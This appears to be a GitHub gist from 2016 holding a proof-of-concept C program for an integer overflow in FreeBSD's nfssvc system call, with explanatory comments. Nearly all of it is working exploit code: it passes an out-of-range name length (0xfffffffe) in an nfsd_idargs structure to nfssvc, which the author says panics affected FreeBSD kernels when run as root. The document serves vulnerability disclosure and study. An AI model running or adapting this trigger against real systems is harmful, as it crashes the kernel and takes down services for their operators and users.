Last active Apr 13, 2016
FreeBSD nfssvc system call integer overflow
PoC for FreeBSD kernel integer overflow in nfssvc system call
Refer to bug report here:
The system call is only accessible as root.
Running this test will panic affected versions of FreeBSD.
clang nfssvc.c -o n
- CTurt
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfsserver/nfs.h>
#include <unistd.h>
/* Value stored in nfsd_idargs.nid_flag by main() below. */
#define NFSID_INITIALIZE 0x0001
/* nfssvc() flag bits; main() ORs these two together for the call.
 * NOTE(review): <nfsserver/nfs.h> is included above — if it already
 * defines any of these macros the replacement token sequences must be
 * identical or the build breaks; TODO confirm against the target headers. */
#define NFSSVC_IDNAME 0x00000200
#define NFSSVC_NEWSTRUCT 0x20000000
/*
 * Argument block handed to nfssvc() for the NFSSVC_IDNAME request.
 * Declared locally so the test does not depend on a particular header
 * exposing it; presumably copied from the FreeBSD sources — TODO confirm
 * the layout matches the kernel being tested.
 *
 * Note that nid_namelen is a plain int: a value such as 0xfffffffe does
 * not fit and is stored as a negative length on two's-complement targets.
 */
struct nfsd_idargs {
    int     nid_flag;           /* request flags, see NFSID_* above */
    uid_t   nid_uid;            /* user id */
    gid_t   nid_gid;            /* group id */
    int     nid_usermax;        /* upper bound on the user-name cache */
    int     nid_usertimeout;    /* user-name timeout, minutes */
    u_char *nid_name;           /* name buffer */
    int     nid_namelen;        /* length of nid_name (signed!) */
    gid_t  *nid_grps;           /* group list */
    int     nid_ngroup;         /* number of entries in nid_grps */
};
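/*
 * Build one nfsd_idargs request whose nid_namelen does not fit the int
 * field and submit it with nfssvc(). Per the description above this needs
 * root and panics affected FreeBSD versions; otherwise the call's return
 * value and errno are printed.
 *
 * Returns 0 after the call, or EXIT_FAILURE if the name buffer could not
 * be allocated.
 */
int main(void) {
    const size_t buf_len = 0x4000;

    u_char *overflow = malloc(buf_len);
    if (overflow == NULL) {
        perror("malloc");
        return EXIT_FAILURE;
    }
    memset(overflow, 'a', buf_len);

    /* Zero every member first so the kernel never reads uninitialised
     * stack contents in the fields this test does not set. */
    struct nfsd_idargs nid = {0};
    nid.nid_flag = NFSID_INITIALIZE;
    nid.nid_name = overflow;
    /* nid_namelen is an int; 0xfffffffe does not fit and becomes -2 on
     * two's-complement targets. That out-of-range length is the trigger. */
    nid.nid_namelen = 0xfffffffe;

    int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
    /* printf() may itself modify errno, so capture it before printing. */
    int saved_errno = errno;

    printf("Result: %d\n", result);
    printf("Errno: %d\n", saved_errno);

    free(overflow);
    return 0;
}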